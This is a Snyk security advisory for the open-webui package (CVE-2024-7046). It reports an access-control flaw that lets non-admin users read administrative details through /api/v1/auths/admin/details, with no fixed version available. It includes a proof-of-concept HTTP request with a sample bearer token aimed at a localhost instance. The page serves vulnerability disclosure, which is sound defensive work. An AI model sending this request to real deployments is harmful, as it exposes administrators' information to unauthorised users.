Homepage

Undefined Behavior for Input to API Affecting open-webui package, versions [0,]

Severity

 Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.03% (7th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-OPENWEBUI-9680265
  • published10 Apr 2025
  • disclosed20 Mar 2025
  • creditfewword
Report a new vulnerability Found a mistake?

Introduced: 20 Mar 2025

NewCVE-2024-7046  (opens in a new tab)
CWE-475  (opens in a new tab)

How to fix?

There is no fixed version for open-webui.

Overview

open-webui is an Open WebUI

Affected versions of this package are vulnerable to Undefined Behavior for Input to API due to improper access control on the /api/v1/auths/admin/details interface. An attacker can view administrative details by directly calling the interface without needing administrative privileges.

Note:

This is only exploitable if the attacker has network access to the application's API.

PoC

GET /api/v1/auths/admin/details HTTP/1.1
Host: localhost:8090
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
Content-Type: application/json
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImYxYWE3YTE4LTYxN2UtNGViOC05ZWE4LWYwYjQ2NTMzYzE0ZiJ9.Wrvss1VJkvwdiS4N8C9UBo17jmsY-3wjynuFoMNrMP8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8090/admin/settings/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

References

CVSS Base Scores

version 4.0
version 3.1